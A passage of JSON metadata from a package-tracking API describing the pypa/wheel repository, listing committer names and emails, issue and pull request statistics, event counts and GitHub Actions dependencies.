Shkenev","packages_count":58,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Peter Shkenev","role":null,"created_at":"2024-06-11T20:36:25.078Z","updated_at":"2024-06-11T20:36:25.078Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/maintainers/santurysim@gmail.com/packages"}],"registry":{"name":"alpine-v3.20","url":"https://pkgs.alpinelinux.org/packages?branch=v3.20","ecosystem":"alpine","default":false,"packages_count":24162,"maintainers_count":405,"namespaces_count":2,"keywords_count":4251,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1476},"icon_url":"https://github.com/alpinelinux.png","created_at":"2024-06-07T11:51:39.915Z","updated_at":"2026-06-10T05:19:00.233Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.20/namespaces"}}],"commits":{"id":1484,"full_name":"pypa/wheel","default_branch":"main","total_commits":961,"total_committers":85,"total_bot_commits":64,"total_bot_committers":1,"mean_commits":11.305882352941177,"dds":0.6170655567117587,"past_year_total_commits":26,"past_year_total_committers":7,"past_year_total_bot_commits":3,"past_year_total_bot_committers":1,"past_year_mean_commits":3.7142857142857144,"past_year_dds":0.5,"last_synced_at":"2026-04-23T00:04:53.147Z","last_synced_commit":"efd83a750f07a33462ea2eed365fd8dac9e51442","created_at":"2023-03-07T09:10:50.524Z","updated_at":"2026-04-23T00:02:56.344Z","committers":[{"name":"Alex Grönholm","email":"alex.gronholm@nextday.fi","login":"agronholm","count":368},{"name":"Daniel Holth","email":"dholth@fastmail.fm","login":"dholth","count":279},{"name":"pre-commit-ci[bot]","email":"66853113+pre-commit-ci[bot]","login":"pre-commit-ci[bot]","count":64},{"name":"Paul Moore","email":"p.f.moore@gmail.com","login":"pfmoore","count":31},{"name":"Nate Coraor","email":"nate@bx.psu.edu","login":"natefoo","count":26},{"name":"Henry Schreiner","email":"HenrySchreinerIII@gmail.com","login":"henryiii","count":21},{"name":"Jon Dufresne","email":"jon.dufresne@gmail.com","login":"jdufresne","count":15},{"name":"Michele Lacchia","email":"michelelacchia@gmail.com","login":"rubik","count":12},{"name":"Dimitri Papadopoulos Orfanos","email":"3234522+DimitriPapadopoulos","login":"DimitriPapadopoulos","count":10},{"name":"Kyle Stewart","email":"4b796c65+bitbucket@gmail.com","login":"HexDecimal","count":7},{"name":"Jason R. Coombs","email":"jaraco@jaraco.com","login":"jaraco","count":6},{"name":"Hugo van Kemenade","email":"hugovk","login":"hugovk","count":6},{"name":"Benoit Pierre","email":"benoit.pierre@gmail.com","login":"benoit-pierre","count":6},{"name":"pombredanne","email":"devnull@localhost","login":null,"count":6},{"name":"Matti Picus","email":"matti.picus@gmail.com","login":"mattip","count":5},{"name":"Marc Abramowitz","email":"marc@marc-abramowitz.com","login":"msabramo","count":4},{"name":"Anderson Bravalheri","email":"andersonbravalheri@gmail.com","login":"abravalheri","count":4},{"name":"Grzegorz Bokota","email":"bokota+github@gmail.com","login":"Czaki","count":4},{"name":"Ales Erjavec","email":"ales.erjavec@fri.uni-lj.si","login":"ales-erjavec","count":3},{"name":"Barry Warsaw","email":"barry@python.org","login":"warsaw","count":3},{"name":"Dustin Ingram","email":"di","login":"di","count":3},{"name":"Kevin Horn","email":"kevin.horn@gmail.com","login":"khorn","count":3},{"name":"anatoly techtonik","email":"techtonik@gmail.com","login":"techtonik","count":3},{"name":"Benedikt Morbach","email":"bmorbach@redhat.com","login":null,"count":3},{"name":"Andrés J. Díaz","email":"ajdiaz@connectical.com","login":null,"count":2},{"name":"nikolas","email":"nikolas@gnu.org","login":"nikolas","count":2},{"name":"Ewout ter Hoeven","email":"E.M.terHoeven@student.tudelft.nl","login":"EwoutH","count":2},{"name":"Min RK","email":"benjaminrk@gmail.com","login":"minrk","count":2},{"name":"Mike Taves","email":"mwtoews@gmail.com","login":"mwtoews","count":2},{"name":"Reece Dunham","email":"me@rdil.rocks","login":"RDIL","count":2},{"name":"Slavek Kabrda","email":"slavek.kabrda@gmail.com","login":"bkabrda","count":2},{"name":"wim glenn","email":"hey@wimglenn.com","login":"wimglenn","count":2},{"name":"Dan Poirier","email":"dan@poirier.us","login":"poirier","count":1},{"name":"C.A.M. Gerlach","email":"CAM.Gerlach@Gerlach.CAM","login":"CAM-Gerlach","count":1},{"name":"Bertil Hatt","email":"bertil.hatt@ensae.org","login":"bertilhatt","count":1},{"name":"David Tucker","email":"david.tucker@emc.com","login":"tucked","count":1},{"name":"Diego Elio Pettenò","email":"flameeyes@flameeyes.com","login":"Flameeyes","count":1},{"name":"shenxianpeng","email":"xianpeng.shen@gmail.com","login":"shenxianpeng","count":1},{"name":"Benjamin Gilbert","email":"bgilbert@backtick.net","login":"bgilbert","count":1},{"name":"Ashish Bhate","email":"bhate.ashish@gmail.com","login":"ashishbhate","count":1},{"name":"Anthony Sottile","email":"asottile@umich.edu","login":"asottile","count":1},{"name":"Anil Kulkarni","email":"6687139+intentionally-left-nil","login":"intentionally-left-nil","count":1},{"name":"Chris Lamb","email":"lamby@debiam.org","login":null,"count":1},{"name":"Donald Stufft","email":"donald@stufft.io","login":"dstufft","count":1},{"name":"Pierre Jaury","email":"pierre@jaury.eu","login":"kaiyou","count":1},{"name":"PoncinMatthieu","email":"matthieu@yousician.com","login":"PoncinMatthieu","count":1},{"name":"Quaylyn Rimer","email":"31830590+killerdevildog","login":"killerdevildog","count":1},{"name":"Ronald Oussoren","email":"ronaldoussoren@mac.com","login":"ronaldoussoren","count":1},{"name":"Roy Smith","email":"roy@panix.com","login":"roysmith","count":1},{"name":"Sam Gross","email":"colesbury@gmail.com","login":"colesbury","count":1},{"name":"Shantanu","email":"12621235+hauntsaninja","login":"hauntsaninja","count":1},{"name":"Stefano Rivera","email":"github@rivera.za.net","login":"stefanor","count":1},{"name":"Sumana Harihareswara","email":"sh@changeset.nyc","login":"brainwane","count":1},{"name":"Teemu R","email":"tpr@iki.fi","login":"rytilahti","count":1},{"name":"Thanos","email":"111999343+Sachaa-Thanasius","login":"Sachaa-Thanasius","count":1},{"name":"Thijs Triemstra","email":"info@collab.nl","login":"thijstriemstra","count":1},{"name":"Thomas Grainger","email":"tagrain@gmail.com","login":"graingert","count":1},{"name":"Xavier Fernandez","email":"xav.fernandez@gmail.com","login":"xavfernandez","count":1},{"name":"Yao Zi","email":"ziyao@disroot.org","login":"ziyao233","count":1},{"name":"Yusuke Hayashi","email":"yusuke8h@gmail.com","login":"yhay81","count":1},{"name":"armorbreak001","email":"contact@agentvote.cc","login":"armorbreak001","count":1},{"name":"ericholscher","email":"eric@ericholscher.com","login":"ericholscher","count":1},{"name":"rdb","email":"rdb","login":"rdb","count":1},{"name":"Nick Loadholtes","email":"nick@ironboundsoftware.com","login":"nloadholtes","count":1},{"name":"Ethan Smith","email":"ethan@ethanhs.me","login":"emmatyping","count":1},{"name":"Hood Chatham","email":"roberthoodchatham@gmail.com","login":"hoodmane","count":1},{"name":"Ian Cordasco","email":"graffatcolmingov@gmail.com","login":"sigmavirus24","count":1},{"name":"JakobDev","email":"jakobdev@gmx.de","login":"JakobDev","count":1},{"name":"Jakub Wilk","email":"jwilk@jwilk.net","login":"jwilk","count":1},{"name":"Jannis Leidel","email":"jannis@leidel.info","login":"jezdez","count":1},{"name":"Jeong, YunWon","email":"69878+youknowone","login":"youknowone","count":1},{"name":"Jeremy Stanley","email":"fungi@yuggoth.org","login":"fungi","count":1},{"name":"John McFarlane","email":"john@rockfloat.com","login":"jmcfarlane","count":1},{"name":"John T. Wodder II","email":"jwodder","login":"jwodder","count":1},{"name":"Jon Brandvein","email":"jon.brandvein@gmail.com","login":"brandjon","count":1},{"name":"Konstantin Lopuhin","email":"kostia.lopuhin@gmail.com","login":"lopuhin","count":1},{"name":"Mathieu Dupuy","email":"deronnax@gmail.com","login":"deronnax","count":1},{"name":"Matt Wozniski","email":"godlygeek@gmail.com","login":"godlygeek","count":1},{"name":"Matthias Bach","email":"matthias.bach@blue-yonder.com","login":"matthias-bach-by","count":1},{"name":"Matthieu Darbois","email":"mayeut","login":"mayeut","count":1},{"name":"Michael Šimáček","email":"el.simacek@gmail.com","login":"msimacek","count":1},{"name":"Michał Górny","email":"mgorny@gentoo.org","login":"mgorny","count":1},{"name":"Mike Geeves","email":"122821835+mike-geeves-oxb","login":"mike-geeves-oxb","count":1},{"name":"Ned Batchelder","email":"ned@nedbatchelder.com","login":"nedbat","count":1},{"name":"Nick Coghlan","email":"ncoghlan@gmail.com","login":"ncoghlan","count":1}],"past_year_committers":[{"name":"Alex Grönholm","email":"alex.gronholm@nextday.fi","login":"agronholm","count":13},{"name":"Dimitri Papadopoulos Orfanos","email":"3234522+DimitriPapadopoulos","login":"DimitriPapadopoulos","count":5},{"name":"pre-commit-ci[bot]","email":"66853113+pre-commit-ci[bot]","login":"pre-commit-ci[bot]","count":3},{"name":"Henry Schreiner","email":"henryfs@princeton.edu","login":"henryiii","count":2},{"name":"nikolas","email":"nikolas@gnu.org","login":"nikolas","count":1},{"name":"armorbreak001","email":"contact@agentvote.cc","login":"armorbreak001","count":1},{"name":"Quaylyn Rimer","email":"31830590+killerdevildog","login":"killerdevildog","count":1}],"commits_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/commits","host":{"name":"GitHub","url":"https://github.com","kind":"github","last_synced_at":"2026-04-24T00:00:07.454Z","repositories_count":6217119,"commits_count":899393027,"contributors_count":34910352,"owners_count":1144660,"icon_url":"https://github.com/github.png","host_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://commits.ecosyste.ms/api/v1/hosts/GitHub/repositories"}},"issues":{"table":{"full_name":"pypa/wheel","html_url":"https://github.com/pypa/wheel","last_synced_at":"2026-03-31T00:01:32.241Z","status":"active","issues_count":111,"pull_requests_count":191,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2567247.8742857142,"issues_closed_count":98,"pull_requests_closed_count":175,"pull_request_authors_count":39,"issue_authors_count":92,"avg_comments_per_issue":5.828828828828828,"avg_comments_per_pull_request":3.6335078534031413,"merged_pull_requests_count":147,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":8,"past_year_pull_requests_count":24,"past_year_avg_time_to_close_issue":290852.2,"past_year_avg_time_to_close_pull_request":1110400.45,"past_year_issues_closed_count":5,"past_year_pull_requests_closed_count":20,"past_year_pull_request_authors_count":9,"past_year_issue_authors_count":8,"past_year_avg_comments_per_issue":6.875,"past_year_avg_comments_per_pull_request":4.291666666666667,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":4,"past_year_merged_pull_requests_count":14,"created_at":"2023-05-10T11:07:02.177Z","updated_at":"2026-03-31T00:01:32.241Z","repository_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","issue_labels_count":{"table":{"enhancement":9,"bug":5,"major":4,"needs-discussion":3,"proposal":3,"question":2,"documentation":2,"invalid":2,"minor":2,"wontfix":1,"duplicate":1,"help wanted":1}},"pull_request_labels_count":{"table":{}},"issue_author_associations_count":{"table":{"NONE":79,"CONTRIBUTOR":26,"MEMBER":6}},"pull_request_author_associations_count":{"table":{"CONTRIBUTOR":168,"NONE":21,"MEMBER":2}},"issue_authors":{"table":{"agronholm":10,"henryiii":4,"rossburton":2,"SpecLad":2,"Reemmfares":2,"jaraco":2,"mwtoews":2,"kloczek":2,"bgilbert":2,"smistad":1,"alex":1,"LecrisUT":1,"frenzymadness":1,"vnmabus":1,"charlesnicholson":1,"JoevDubach":1,"wqh17101":1,"AndreaCensi":1,"Earammak":1,"vulli321":1,"madmac2501":1,"pombredanne":1,"hroncok":1,"uranusjr":1,"defaultbranch":1,"miuliano":1,"jwodder":1,"itraviv":1,"fervand1":1,"mtelka":1,"MKuranowski":1,"alcroito":1,"nextsilicon-itay-bookstein":1,"hauntsaninja":1,"hloeung":1,"bastimeyer":1,"vdanilin":1,"bersbersbers":1,"GliderGeek":1,"yjqg6666":1,"mara004":1,"davidism":1,"finnagin":1,"abravalheri":1,"pradyunsg":1,"waylan":1,"kumaraditya303":1,"yoohantala":1,"julienlavergne":1,"graingert":1,"DimitriPapadopoulos":1,"NeilBetham":1,"nrpt-m":1,"MeggyCal":1,"woodruffw":1,"atom00":1,"jcwchen":1,"mdavidsaver":1,"wangmingyu84":1,"jaklaassen-affirm":1,"pelson":1,"mathstuf":1,"mgorny":1,"pmp-p":1,"CarliJoy":1,"intentionally-left-nil":1,"Starbuck5":1,"marcoscunha":1,"zhangtaohbwh":1,"ssabdb":1,"miccoli":1,"tbsuht":1,"KOLANICH":1,"DavidTProto":1,"ethereum-cat-herders":1,"NotSqrt":1,"doctorpangloss":1,"steven-murray":1,"JelleZijlstra":1,"gilfree":1,"ofek":1,"ZacharyThomas":1,"stefan6419846":1,"geofft":1,"Elsarques":1,"MarkKoz":1,"ayin1551":1,"mattip":1,"fxcoudert":1,"theCapypara":1,"lkollar":1,"abhinavsingh":1}},"pull_request_authors":{"table":{"pre-commit-ci[bot]":65,"DimitriPapadopoulos":25,"henryiii":22,"agronholm":20,"abravalheri":5,"HexDecimal":5,"neutrinoceros":2,"gilfree":2,"ethanhs":2,"hauntsaninja":2,"killerdevildog":2,"youknowone":2,"graingert":2,"mwtoews":2,"ziyao233":2,"finnagin":2,"shenxianpeng":2,"intentionally-left-nil":2,"Sachaa-Thanasius":2,"EwoutH":2,"mgorny":2,"wimglenn":2,"bgilbert":1,"jacobdr":1,"idiosyncratic4":1,"mayeut":1,"msimacek":1,"methane":1,"pelson":1,"mike-geeves-oxb":1,"deronnax":1,"tucked":1,"nikolas":1,"colesbury":1,"di":1,"sethmlarson":1,"mattip":1,"stefanor":1,"JakobDev":1}},"host":{"table":{"name":"GitHub","url":"https://github.com","kind":"github","last_synced_at":"2026-03-31T00:00:10.865Z","repositories_count":14016301,"issues_count":34575790,"pull_requests_count":113118028,"authors_count":11212633,"icon_url":"https://github.com/github.png","host_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories","owners_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/owners","authors_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors"}},"past_year_issue_labels_count":{"table":{}},"past_year_pull_request_labels_count":{"table":{}},"past_year_issue_author_associations_count":{"table":{"NONE":8}},"past_year_pull_request_author_associations_count":{"table":{"CONTRIBUTOR":16,"NONE":8}},"past_year_issue_authors":{"table":{"abhinavsingh":1,"CarliJoy":1,"fervand1":1,"finnagin":1,"MeggyCal":1,"steven-murray":1,"wangmingyu84":1,"zhangtaohbwh":1}},"past_year_pull_request_authors":{"table":{"DimitriPapadopoulos":9,"pre-commit-ci[bot]":4,"finnagin":2,"killerdevildog":2,"neutrinoceros":2,"ziyao233":2,"henryiii":1,"nikolas":1,"sethmlarson":1}},"maintainers":[{"table":{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}},{"table":{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"}},{"table":{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"}},{"table":{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"}},{"table":{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"}},{"table":{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"}},{"table":{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}}],"active_maintainers":[]}},"events":{"total":{"ReleaseEvent":4,"DeleteEvent":12,"PullRequestEvent":30,"ForkEvent":18,"IssuesEvent":68,"WatchEvent":33,"IssueCommentEvent":255,"PushEvent":46,"PullRequestReviewEvent":17,"PullRequestReviewCommentEvent":13,"CreateEvent":12},"last_year":{"ReleaseEvent":2,"DeleteEvent":4,"PullRequestEvent":17,"ForkEvent":11,"IssuesEvent":17,"WatchEvent":18,"IssueCommentEvent":144,"PushEvent":17,"PullRequestReviewCommentEvent":4,"PullRequestReviewEvent":5,"CreateEvent":6}},"keywords":[],"dependencies":[{"ecosystem":"actions","filepath":".github/workflows/publish.yml","sha":null,"kind":"manifest","created_at":"2023-01-13T22:53:00.020Z","updated_at":"2023-01-13T22:53:00.020Z","repository_link":"https://github.com/pypa/wheel/blob/main/.github/workflows/publish.yml","dependencies":[{"id":6891675847,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":6891675848,"package_name":"actions/setup-python","ecosystem":"actions","requirements":"v4","direct":true,"kind":"composite","optional":false},{"id":6891675849,"package_name":"pypa/gh-action-pypi-publish","ecosystem":"actions","requirements":"release/v1","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/test.yml","sha":null,"kind":"manifest","created_at":"2023-01-13T22:53:00.037Z","updated_at":"2023-01-13T22:53:00.037Z","repository_link":"https://github.com/pypa/wheel/blob/main/.github/workflows/test.yml","dependencies":[{"id":6891675850,"package_name":"actions/checkout","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":6891675851,"package_name":"actions/setup-python","ecosystem":"actions","requirements":"v4","direct":true,"kind":"composite","optional":false},{"id":6891675852,"package_name":"actions/cache","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false},{"id":6891675853,"package_name":"codecov/codecov-action","ecosystem":"actions","requirements":"v3","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"pypi","filepath":"pyproject.toml","sha":null,"kind":"manifest","created_at":"2023-10-30T10:34:29.307Z","updated_at":"2023-10-30T10:34:29.307Z","repository_link":"https://github.com/pypa/wheel/blob/main/pyproject.toml","dependencies":[]}],"score":34.34052915865669,"created_at":"2025-10-10T19:47:13.046Z","updated_at":"2026-06-21T00:30:47.252Z","avatar_url":"https://github.com/pypa.png","language":"Python","codemeta":null,"publiccode":null,"project_url":"https://summary.ecosyste.ms/api/v1/projects/369034","html_url":"https://summary.ecosyste.ms/projects/369034"}